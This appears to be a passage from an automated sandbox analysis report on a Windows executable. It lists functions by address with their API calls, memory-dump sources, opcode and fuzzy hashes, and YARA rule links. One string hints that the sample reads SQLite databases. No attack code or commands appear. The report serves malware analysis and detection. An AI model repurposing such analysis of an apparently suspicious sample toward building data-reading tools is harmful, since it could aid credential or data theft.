                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3550944819-0
                                                                                                                  • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                  • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                  • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                  • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                  Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • free.MSVCRT ref: 0040F561
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                  • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$free
                                                                                                                  • String ID: g4@
                                                                                                                  • API String ID: 2888793982-2133833424
                                                                                                                  • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                  • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                  • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                  • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                  Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                  • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                  • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 3510742995-2766056989
                                                                                                                  • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                  • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                  • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                  • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                  Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                                  • memset.MSVCRT ref: 0040AF18
                                                                                                                  • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1865533344-0
                                                                                                                  • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                  • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                  • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                  • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                  Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004144E7
                                                                                                                    • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                    • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                  • memset.MSVCRT ref: 0041451A
                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1127616056-0
                                                                                                                  • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                  • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                  • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                  • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                  Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                  • memset.MSVCRT ref: 0042FED3
                                                                                                                  • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset
                                                                                                                  • String ID: sqlite_master
                                                                                                                  • API String ID: 438689982-3163232059
                                                                                                                  • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                  • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                  • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                  • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                  Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                  • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3917621476-0
                                                                                                                  • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                  • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                  • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                  • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                  Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                  • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                  • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                  • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                  • wcscat.MSVCRT ref: 0041101F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 822687973-0
                                                                                                                  • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                  • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                  • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                  • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                  Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7626DF80,?,0041755F,?), ref: 00417452
                                                                                                                  • malloc.MSVCRT ref: 00417459
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7626DF80,?,0041755F,?), ref: 00417478
                                                                                                                  • free.MSVCRT ref: 0041747F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2605342592-0
                                                                                                                  • Opcode ID: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                  • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                  • Opcode Fuzzy Hash: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                  • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                  Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                                                  • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                  • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2678498856-0
                                                                                                                  • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                  • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                  • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                  • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                  Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Item
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3888421826-0
                                                                                                                  • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                  • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                  • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                  • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                  Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00417B7B
                                                                                                                  • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                  • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                  • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3727323765-0
                                                                                                                  • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                  • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                  • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                  • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                  Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040F673
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                                                  • strlen.MSVCRT ref: 0040F6A2
                                                                                                                  • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2754987064-0
                                                                                                                  • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                  • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                  • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                  • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                  Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040F6E2
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                                                  • strlen.MSVCRT ref: 0040F70D
                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2754987064-0
                                                                                                                  • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                  • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                  • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                  • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                  Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00402FD7
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                  • strlen.MSVCRT ref: 00403006
                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2754987064-0
                                                                                                                  • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                                  • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                  • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                                  • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                  Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                    • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                    • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                  • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 764393265-0
                                                                                                                  • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                  • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                  • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                  • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                  Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$System$File$LocalSpecific
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 979780441-0
                                                                                                                  • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                  • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                  • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                  • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                  Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                  • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$DialogHandleModuleParam
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1386444988-0
                                                                                                                  • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                  • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                  • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                  • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                  Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: InvalidateMessageRectSend
                                                                                                                  • String ID: d=E
                                                                                                                  • API String ID: 909852535-3703654223
